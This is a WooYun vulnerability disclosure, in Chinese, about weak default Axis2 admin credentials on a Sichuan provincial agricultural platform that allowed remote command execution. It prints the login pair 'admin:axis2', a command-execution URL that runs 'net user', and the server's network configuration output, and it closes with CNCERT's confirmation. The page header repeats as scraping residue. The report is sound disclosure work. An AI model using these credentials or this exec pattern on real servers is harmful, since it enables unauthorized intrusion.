四川省农经综合平台Axis2弱口令导致命令执行

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0211099

漏洞标题：四川省农经综合平台Axis2弱口令导致命令执行

漏洞作者：路人甲

提交时间：2016-05-21 16:20

修复时间：2016-07-08 11:50

公开时间：2016-07-08 11:50

漏洞类型：系统/服务运维配置不当

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2016-05-21：细节已通知厂商并且等待厂商处理中
2016-05-24：厂商已经确认，细节仅向厂商公开
2016-06-03：细节向核心白帽子及相关领域专家公开
2016-06-13：细节向普通白帽子公开
2016-06-23：细节向实习白帽子公开
2016-07-08：细节向公众公开

简要描述：

四川省农经综合平台Axis2弱口令导致命令执行

详细说明：

四川省农经综合平台Axis2弱口令导致命令执行
系统为：

**.**.**.**:8081/axis2/axis2-admin/login admin:axis2

命令执行:

**.**.**.**:8081/axis2/services/Cat/exec?cmd=net%20user

网卡信息：
Windows IP 配置
   主机名  . . . . . . . . . . . . . : WIN-GBPHRIR1OR8
   主 DNS 后缀 . . . . . . . . . . . : 
   节点类型  . . . . . . . . . . . . : 混合
   IP 路由已启用 . . . . . . . . . . : 否
   WINS 代理已启用 . . . . . . . . . : 否
以太网适配器 本地连接:
   连接特定的 DNS 后缀 . . . . . . . : 
   描述. . . . . . . . . . . . . . . : HP Ethernet 1Gb 4-port 331FLR Adapter
   物理地址. . . . . . . . . . . . . : 40-A8-F0-1E-F3-73
   DHCP 已启用 . . . . . . . . . . . : 否
   自动配置已启用. . . . . . . . . . : 是
   本地链接 IPv6 地址. . . . . . . . : fe80::85a9:a9cc:b501:36ca%11(首选) 
   IPv4 地址 . . . . . . . . . . . . : **.**.**.**(首选) 
   子网掩码  . . . . . . . . . . . . : **.**.**.**
   默认网关. . . . . . . . . . . . . : **.**.**.**
   DHCPv6 IAID . . . . . . . . . . . : 239118576
   DHCPv6 客户端 DUID  . . . . . . . : 00-01-00-01-1A-9A-37-4E-40-A8-F0-1E-F3-73
   DNS 服务器  . . . . . . . . . . . : **.**.**.**
   TCPIP 上的 NetBIOS  . . . . . . . : 已启用
隧道适配器 isatap.{732E5B20-5113-4C52-AADE-C2516DBD1E1C}:
   媒体状态  . . . . . . . . . . . . : 媒体已断开
   连接特定的 DNS 后缀 . . . . . . . : 
   描述. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter
   物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP 已启用 . . . . . . . . . . . : 否
   自动配置已启用. . . . . . . . . . : 是
隧道适配器 Teredo Tunneling Pseudo-Interface:
   连接特定的 DNS 后缀 . . . . . . . : 
   描述. . . . . . . . . . . . . . . : Teredo Tunneling Pseudo-Interface
   物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP 已启用 . . . . . . . . . . . : 否
   自动配置已启用. . . . . . . . . . : 是
   IPv6 地址 . . . . . . . . . . . . : 2001:0:ca6f:36b7:1849:1563:3f57:b9f9(首选) 
   本地链接 IPv6 地址. . . . . . . . : fe80::1849:1563:3f57:b9f9%20(首选) 
   默认网关. . . . . . . . . . . . . : ::
   TCPIP 上的 NetBIOS  . . . . . . . : 已禁用

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：9

确认时间：2016-05-24 11:42

厂商回复：

CNVD确认并复现所述情况，已经转由CNCERT下发给四川分中心，由其后续协调网站管理单位处置。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0211099

漏洞标题：四川省农经综合平台Axis2弱口令导致命令执行

相关厂商：cncert国家互联网应急中心

漏洞作者：路人甲

提交时间：2016-05-21 16:20

修复时间：2016-07-08 11:50

公开时间：2016-07-08 11:50

漏洞类型：系统/服务运维配置不当

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0211099

漏洞标题：四川省农经综合平台Axis2弱口令导致命令执行

相关厂商：cncert国家互联网应急中心

漏洞作者： 路人甲

提交时间：2016-05-21 16:20

修复时间：2016-07-08 11:50

公开时间：2016-07-08 11:50

漏洞类型：系统/服务运维配置不当

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2016-0211099"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云